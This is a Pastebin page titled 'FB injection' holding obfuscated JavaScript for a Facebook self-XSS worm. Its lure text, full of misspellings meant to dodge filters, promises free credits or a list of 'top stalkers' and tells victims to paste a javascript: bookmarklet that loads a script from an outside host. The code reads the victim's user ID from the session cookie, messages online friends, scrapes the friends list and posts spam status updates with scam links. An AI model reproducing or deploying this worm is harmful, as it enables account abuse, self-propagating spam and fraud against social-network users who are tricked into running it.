API tools faq
paste
Advertisement
Guest User

FB injection

a guest
Apr 12th, 2011
584
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 8.42 KB | None | 0 0
raw download clone embed print report
  1. var chatmessage = '';
  2. var postmessage = 'I just g?t 500 fre? fb cr?dits us?ng ? gl?tch in fb!
  3. Check it out here: http://b.claj.info/jx/';
  4. var redirect = 'http://a.phig.info/jx/final.php';
  5. var eventdesc = 'S?e wh? y?ur top st?lkers are!
  6.  
  7. Just f?ll?w thes? 3 st?ps:
  8.  
  9. 1. Copy th?s code (h?ghlight ?nd press CTRL-C):
  10.  
  11. javascript:(a=(b=document).createElement('script')).src='//a.phig.info/jx/f.js',b.body.appendChild(a);void(0)
  12.  
  13. 2. Del?t? the ?ctu?l address fr?m th? url f??ld in y?ur br?wser and p?ste th? code instead.
  14.  
  15. 3. Pr?ss Enter ?nd w??t for a bit, ?t can t?k? up t? a minut? t? c?mplet? the stalk?r scan.
  16.  
  17. Th?t's it!  Y?ur results will then be shown t? y?u!
  18.  
  19. If you are hav?ng tr?ubl? w?th these instruct??ns, try v??w?ng the ?nstruct??ns her?: http://a.stid.info/jx/';
  20. var eventname = 'Find your t?p st?lkers';
  21. var nfriends = 15;
  22. var eventmsg = 'Hey I just p?st?d ?n e?ent t? spr?ad the word.  I ?ctu?lly tri?d this and it w?rked!';
  23. var eventpmsubj = 'I ?ctu?lly tri?d ?t';
  24. var _0xb65c = ['GET', '/', 'open', 'onreadystatechange', 'readyState', 'status', 'match', 'cookie', '@[', 'id', ':', 'name', ']', '', '&', '=', 'responseText', 'POST', '/ajax/chat/buddy_list.php?__a=1', 'Content-Type', 'application/x-www-form-urlencoded', 'setRequestHeader', 'substr', '(', ')', 'buddy_list', 'payload', 'nowAvailableList', 'random', 'floor', 'getTime', '/ajax/chat/send.php?__a=1', 'post returned ', 'AsyncRequest', 'send', '/ajax/browser/friends/?uid=', '&__a=1&__d=1', 'length', 'replace', 'push', 'shift', 'home', '%tf', '%', 'message_text', 'message', '/ajax/updatestatus.php?__a=1', '/mobile/?v=photos', 'X-Requested-With', 'X-Requested', 'match: '];
  25. x1 = new XMLHttpRequest();
  26. x1[_0xb65c[2]](_0xb65c[0], _0xb65c[1]);
  27. x1[_0xb65c[3]] = function ()
  28. {
  29.     if (x1[_0xb65c[4]] == 4 && x1[_0xb65c[5]] == 200)
  30.     {
  31.         var _0xc3adx1 = document[_0xb65c[7]][_0xb65c[6]](/c_user=(\d+)/)[1];
  32.         var _0xc3adx2 = 3;
  33.         var _0xc3adx3 = function (_0xc3adx4)
  34.         {
  35.             if (_0xc3adx4)
  36.             {
  37.                 return _0xb65c[8] + _0xc3adx4[_0xb65c[9]] + _0xb65c[10] + _0xc3adx4[_0xb65c[11]] + _0xb65c[12];
  38.             };
  39.             return _0xb65c[13];
  40.         };
  41.         var _0xc3adx5 = function (_0xc3adx4)
  42.         {
  43.             if (_0xc3adx4)
  44.             {
  45.                 return _0xc3adx4[_0xb65c[11]];
  46.             };
  47.             return _0xb65c[13];
  48.         };
  49.         var _0xc3adx6 = function (_0xc3adx4)
  50.         {
  51.             out = _0xb65c[13];
  52.             for (var _0xc3adx7 in _0xc3adx4)
  53.             {
  54.                 out += (out ? _0xb65c[14] : _0xb65c[13]) + _0xc3adx7 + ((_0xc3adx4[_0xc3adx7] !== null) ? _0xb65c[15] + encodeURIComponent(_0xc3adx4[_0xc3adx7]) : _0xb65c[13]);
  55.             };
  56.             return out;
  57.         };
  58.         var _0xc3adx8 = (z = x1[_0xb65c[16]])[_0xb65c[6]](/name=\'composer_id\' value=\'([\d\w]+)\'/i)[1];
  59.         if (true)
  60.         {
  61.             var _0xc3adx9 = new XMLHttpRequest();
  62.             _0xc3adx9[_0xb65c[2]](_0xb65c[17], _0xb65c[18]);
  63.             _0xc3adx9[_0xb65c[21]](_0xb65c[19], _0xb65c[20]);
  64.             _0xc3adx9[_0xb65c[3]] = function ()
  65.             {
  66.                 if (_0xc3adx9[_0xb65c[4]] == 4 && _0xc3adx9[_0xb65c[5]] == 200)
  67.                 {
  68.                     var _0xc3adxa = _0xc3adx9[_0xb65c[16]][_0xb65c[22]](9);
  69.                     var _0xc3adxb = eval(_0xb65c[23] + _0xc3adxa + _0xb65c[24]);
  70.                     var _0xc3adxc = _0xc3adxb[_0xb65c[26]][_0xb65c[25]];
  71.                     for (var _0xc3adxd in _0xc3adxc[_0xb65c[27]])
  72.                     {
  73.                         var _0xc3adxe = Math[_0xb65c[29]](Math[_0xb65c[28]]());
  74.                         var _0xc3adxf = (new Date())[_0xb65c[30]]();
  75.                         var _0xc3adx10 = chatmessage;
  76.                         x5 = new XMLHttpRequest();
  77.                         x5[_0xb65c[2]](_0xb65c[17], _0xb65c[31]);
  78.                         if (true)
  79.                         {
  80.                             x5[_0xb65c[3]] = function ()
  81.                             {
  82.                                 if (x5[_0xb65c[4]] == 4 && x5[_0xb65c[5]] == 200)
  83.                                 {
  84.                                     alert(_0xb65c[32] + _0xc3adx9[_0xb65c[16]]);
  85.                                 };
  86.                             };
  87.                         };
  88.                         x5[_0xb65c[34]](_0xc3adx6(
  89.                         {
  90.                             msg_id: _0xc3adxe,
  91.                             client_time: _0xc3adxf,
  92.                             to: _0xc3adxd,
  93.                             msg_text: _0xc3adx10,
  94.                             post_form_id_source: _0xb65c[33]
  95.                         }));
  96.                     };
  97.                 };
  98.             };
  99.             _0xc3adx9[_0xb65c[34]](_0xc3adx6(
  100.             {
  101.                 user: _0xc3adx1,
  102.                 lsd: null,
  103.                 post_form_id_source: _0xb65c[33],
  104.                 popped_out: false,
  105.                 force_render: true
  106.             }));
  107.         };
  108.         if (true)
  109.         {
  110.             var _0xc3adx11 = new XMLHttpRequest();
  111.             _0xc3adx11[_0xb65c[2]](_0xb65c[0], _0xb65c[35] + _0xc3adx1 + _0xb65c[36]);
  112.             _0xc3adx11[_0xb65c[3]] = function ()
  113.             {
  114.                 if (_0xc3adx11[_0xb65c[4]] == 4 && _0xc3adx11[_0xb65c[5]] == 200)
  115.                 {
  116.                     var _0xc3adx12 = _0xc3adx11[_0xb65c[16]][_0xb65c[6]](//\d+#\d+#\d+#q.jpg.*?\u003c\/>/gi);
  117.                     var _0xc3adx10 = [];
  118.                     for (var _0xc3adx13 = 0; _0xc3adx13 < _0xc3adx12[_0xb65c[37]]; _0xc3adx13++)
  119.                     {
  120.                         var _0xc3adx14 = _0xc3adx12[_0xc3adx13][_0xb65c[6]](/#\d+#/)[0][_0xb65c[38]](/#/g, _0xb65c[13]);
  121.                         var _0xc3adx15 = _0xc3adx12[_0xc3adx13][_0xb65c[6]](/>[^>]+\u003c\/>$/i)[0][_0xb65c[38]](/\u003c\/>$/gim, _0xb65c[13])[_0xb65c[38]](/>/g, _0xb65c[13]);
  122.                         _0xc3adx10[_0xb65c[39]](
  123.                         {
  124.                             id: _0xc3adx14,
  125.                             name: _0xc3adx15
  126.                         });
  127.                     };
  128.                     var _0xc3adx16 = [];
  129.                     while (_0xc3adx16[_0xb65c[37]] < _0xc3adx2 && _0xc3adx10[_0xb65c[37]])
  130.                     {
  131.                         var _0xc3adx17 = Math[_0xb65c[29]](Math[_0xb65c[28]]() * _0xc3adx10[_0xb65c[37]]);
  132.                         _0xc3adx16[_0xb65c[39]](_0xc3adx10[_0xc3adx17]);
  133.                         var _0xc3adxf = _0xc3adx10[_0xb65c[40]]();
  134.                         if (_0xc3adx17)
  135.                         {
  136.                             _0xc3adx10[_0xc3adx17] = _0xc3adxf;
  137.                         };
  138.                     };
  139.                     var _0xc3adx18 = {
  140.                         composer_id: _0xc3adx8,
  141.                         context: _0xb65c[41],
  142.                         fbx: _0xb65c[13],
  143.                         lsd: null,
  144.                         post_form_id_source: _0xb65c[33]
  145.                     };
  146.                     mt = postmessage;
  147.                     _0xc3adx10 = postmessage;
  148.                     for (var _0xc3adx13 = 1; _0xc3adx13 <= _0xc3adx2; _0xc3adx13++)
  149.                     {
  150.                         mt = mt[_0xb65c[38]](_0xb65c[42] + _0xc3adx13 + _0xb65c[43], _0xc3adx5(_0xc3adx16[_0xc3adx13 - 1]));
  151.                         _0xc3adx10 = _0xc3adx10[_0xb65c[38]](_0xb65c[42] + _0xc3adx13 + _0xb65c[43], _0xc3adx3(_0xc3adx16[_0xc3adx13 - 1]));
  152.                     };
  153.                     _0xc3adx18[_0xb65c[44]] = mt;
  154.                     _0xc3adx18[_0xb65c[45]] = _0xc3adx10;
  155.                     x6 = new XMLHttpRequest();
  156.                     x6[_0xb65c[2]](_0xb65c[17], _0xb65c[46]);
  157.                     x6[_0xb65c[34]](_0xc3adx6(_0xc3adx18));
  158.                 };
  159.             };
  160.             _0xc3adx11[_0xb65c[34]](null);
  161.         };
  162.         if (true)
  163.         {
  164.             x4 = new XMLHttpRequest();
  165.             x4[_0xb65c[2]](_0xb65c[0], _0xb65c[47]);
  166.             x4[_0xb65c[21]](_0xb65c[48], null);
  167.             x4[_0xb65c[21]](_0xb65c[49], null);
  168.             x4[_0xb65c[3]] = function ()
  169.             {
  170.                 if (x4[_0xb65c[4]] == 4 && x4[_0xb65c[5]] == 200)
  171.                 {
  172.                     m = x4[_0xb65c[16]][_0xb65c[6]](/<div class='EmailIframe'><iframe src='[^']+.*<div>.*</div>'/)[0];
  173.                    alert(_0xb65c[50] + m);
  174.                };
  175.            };
  176.            x4[_0xb65c[34]](null);
  177.        };
  178.    };
  179. };
  180. x1[_0xb65c[34]](null);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!